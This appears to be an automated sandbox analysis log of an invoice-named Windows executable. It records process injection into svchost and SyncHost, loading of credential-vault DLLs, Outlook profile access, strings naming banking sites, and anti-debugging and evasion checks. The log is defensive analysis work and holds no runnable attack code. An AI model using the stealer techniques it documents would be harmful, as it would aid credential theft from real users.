Source: SyncHost.exe, 00000005.00000003.2056602184.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000002.2564765311.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000002.2564765311.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000002.2564765311.0000000003420000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: INVOICE #546 JPT.exe Virustotal: Detection: 48%
Source: INVOICE #546 JPT.exe ReversingLabs: Detection: 68%
Source: unknown Process created: C:\Users\user\Desktop\INVOICE #546 JPT.exe "C:\Users\user\Desktop\INVOICE #546 JPT.exe"
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INVOICE #546 JPT.exe"
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe Process created: C:\Windows\SysWOW64\SyncHost.exe "C:\Windows\SysWOW64\SyncHost.exe"
Source: C:\Windows\SysWOW64\SyncHost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INVOICE #546 JPT.exe" Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe Process created: C:\Windows\SysWOW64\SyncHost.exe "C:\Windows\SysWOW64\SyncHost.exe" Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: winsync.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: INVOICE #546 JPT.exe Static file information: File size 1204224 > 1048576
Source: INVOICE #546 JPT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: INVOICE #546 JPT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: INVOICE #546 JPT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: INVOICE #546 JPT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: INVOICE #546 JPT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: INVOICE #546 JPT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: INVOICE #546 JPT.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: SyncHost.pdbGCTL source: svchost.exe, 00000001.00000003.1811706078.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, ZjXK6gQah.exe, 00000004.00000002.2565051186.000000000072E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: INVOICE #546 JPT.exe, 00000000.00000003.1311500943.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, INVOICE #546 JPT.exe, 00000000.00000003.1310608844.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1843902855.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1747311862.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1745842859.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1843902855.000000000369E000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000003.1870675046.0000000004F4A000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000002.2566014132.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000003.1868647490.0000000004D95000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000002.2566014132.000000000528E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: INVOICE #546 JPT.exe, 00000000.00000003.1311500943.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, INVOICE #546 JPT.exe, 00000000.00000003.1310608844.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1843902855.0000000003500000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1747311862.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1745842859.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1843902855.000000000369E000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, SyncHost.exe, 00000005.00000003.1870675046.0000000004F4A000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000002.2566014132.00000000050F0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000003.1868647490.0000000004D95000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000002.2566014132.000000000528E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: SyncHost.pdb source: svchost.exe, 00000001.00000003.1811706078.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, ZjXK6gQah.exe, 00000004.00000002.2565051186.000000000072E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: SyncHost.exe, 00000005.00000002.2564765311.0000000003379000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000002.2566440680.000000000571C000.00000004.10000000.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000008.00000000.1946404710.000000000344C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2165842541.0000000038FBC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: SyncHost.exe, 00000005.00000002.2564765311.0000000003379000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 00000005.00000002.2566440680.000000000571C000.00000004.10000000.00040000.00000000.sdmp, ZjXK6gQah.exe, 00000008.00000000.1946404710.000000000344C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2165842541.0000000038FBC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZjXK6gQah.exe, 00000004.00000002.2564735998.000000000041F000.00000002.00000001.01000000.00000004.sdmp, ZjXK6gQah.exe, 00000008.00000002.2564414596.000000000041F000.00000002.00000001.01000000.00000004.sdmp
Source: INVOICE #546 JPT.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: INVOICE #546 JPT.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: INVOICE #546 JPT.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: INVOICE #546 JPT.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: INVOICE #546 JPT.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005C4B37 LoadLibraryA,GetProcAddress, 0_2_005C4B37
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005CC4C6 push A3005CBAh; retn 005Ch 0_2_005CC50D
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005E8945 push ecx; ret 0_2_005E8958
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041206E push ecx; retf 1_2_00412071
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004098E6 push 00000013h; ret 1_2_00409907
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004152D3 pushfd ; retf 1_2_004152D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004072A6 push esp; iretd 1_2_00407324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040730A push esp; iretd 1_2_00407324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004033B0 push eax; ret 1_2_004033B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00411E43 push edi; iretd 1_2_00411E4D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00411E6E push edi; iretd 1_2_00411E4D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00411E37 push edi; iretd 1_2_00411E4D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00411F75 pushad ; retf 1_2_00411F76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041877C push FFFFFF94h; iretd 1_2_00418780
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041EF33 push ebp; ret 1_2_0041EFB7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401FF4 push edi; retf 1_2_00401FF8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0350225F pushad ; ret 1_2_035027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035027FA pushad ; ret 1_2_035027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035309AD push ecx; mov dword ptr [esp], ecx 1_2_035309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0350283D push eax; iretd 1_2_03502858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0350135E push eax; iretd 1_2_03501369
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_051209AD push ecx; mov dword ptr [esp], ecx 5_2_051209B6
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D96533 push 00000013h; ret 5_2_02D96554
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D9EA90 push edi; iretd 5_2_02D9EA9A
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D9EA84 push edi; iretd 5_2_02D9EA9A
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D9EABB push edi; iretd 5_2_02D9EA9A
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D9EBC2 pushad ; retf 5_2_02D9EBC3
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DB2820 push es; iretd 5_2_02DB2845
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02D9ECBB push ecx; retf 5_2_02D9ECBE
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DA53C9 push FFFFFF94h; iretd 5_2_02DA53CD
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DA5528 pushad ; iretd 5_2_02DA5529
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DABB80 push ebp; ret 5_2_02DABC04
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_005C48D7
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00645376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00645376
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005E3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_005E3187
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe API/Special instruction interceptor: Address: 1109F7C
Source: C:\Windows\SysWOW64\SyncHost.exe API/Special instruction interceptor: Address: 7FF84F7AD324
Source: C:\Windows\SysWOW64\SyncHost.exe API/Special instruction interceptor: Address: 7FF84F7AD7E4
Source: C:\Windows\SysWOW64\SyncHost.exe API/Special instruction interceptor: Address: 7FF84F7AD944
Source: C:\Windows\SysWOW64\SyncHost.exe API/Special instruction interceptor: Address: 7FF84F7AD504
Source: C:\Windows\SysWOW64\SyncHost.exe API/Special instruction interceptor: Address: 7FF84F7AD544
Source: C:\Windows\SysWOW64\SyncHost.exe API/Special instruction interceptor: Address: 7FF84F7AD1E4
Source: C:\Windows\SysWOW64\SyncHost.exe API/Special instruction interceptor: Address: 7FF84F7B0154
Source: C:\Windows\SysWOW64\SyncHost.exe API/Special instruction interceptor: Address: 7FF84F7ADA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0357096E rdtsc 1_2_0357096E
Source: C:\Windows\SysWOW64\SyncHost.exe Window / User API: threadDelayed 9804 Jump to behavior
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe API coverage: 4.5 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\SyncHost.exe API coverage: 2.7 %
Source: C:\Windows\SysWOW64\SyncHost.exe TID: 9168 Thread sleep count: 165 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe TID: 9168 Thread sleep time: -330000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe TID: 9168 Thread sleep count: 9804 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe TID: 9168 Thread sleep time: -19608000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\OJcVWtBPwQQSASakXRJpaJHntYIgjBwxnZzAaeGjihwtkSasTFpFkaxByPesaaSBFWAGImcBLqj\ZjXK6gQah.exe TID: 9188 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\SyncHost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0062445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0062445A
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0062C6D1 FindFirstFileW,FindClose, 0_2_0062C6D1
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0062C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0062C75C
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0062EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0062EF95
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0062F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0062F0F2
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0062F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0062F3F3
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_006237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_006237EF
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00623B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00623B12
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0062BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0062BCBC
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 5_2_02DACC90 FindFirstFileW,FindNextFileW,FindClose, 5_2_02DACC90
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_005C49A0
Source: C8NA30-G.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: C8NA30-G.5.dr Binary or memory string: discord.comVMware20,11696428655f
Source: C8NA30-G.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: C8NA30-G.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: C8NA30-G.5.dr Binary or memory string: global block list test formVMware20,11696428655
Source: C8NA30-G.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: C8NA30-G.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: C8NA30-G.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: C8NA30-G.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: C8NA30-G.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: C8NA30-G.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: C8NA30-G.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: C8NA30-G.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: C8NA30-G.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: C8NA30-G.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: C8NA30-G.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: C8NA30-G.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: C8NA30-G.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: C8NA30-G.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: C8NA30-G.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: C8NA30-G.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: C8NA30-G.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: C8NA30-G.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: C8NA30-G.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: SyncHost.exe, 00000005.00000002.2564765311.0000000003379000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: C8NA30-G.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: C8NA30-G.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: C8NA30-G.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: ZjXK6gQah.exe, 00000008.00000002.2565157941.00000000014C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: C8NA30-G.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: C8NA30-G.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C8NA30-G.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C8NA30-G.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: firefox.exe, 00000009.00000002.2175069244.0000020CB906C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>>
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0357096E rdtsc 1_2_0357096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00417F83 LdrLoadDll, 1_2_00417F83
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_00633F09 BlockInput, 0_2_00633F09
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_005C3B3A
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005F5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_005F5A7C
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_005C4B37 LoadLibraryA,GetProcAddress, 0_2_005C4B37
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0110A1E8 mov eax, dword ptr fs:[00000030h] 0_2_0110A1E8
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_0110A248 mov eax, dword ptr fs:[00000030h] 0_2_0110A248
Source: C:\Users\user\Desktop\INVOICE #546 JPT.exe Code function: 0_2_01108BA8 mov eax, dword ptr fs:[00000030h] 0_2_01108BA8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h] 1_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h] 1_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h] 1_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B035C mov ecx, dword ptr fs:[00000030h] 1_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h] 1_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h] 1_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FA352 mov eax, dword ptr fs:[00000030h] 1_2_035FA352
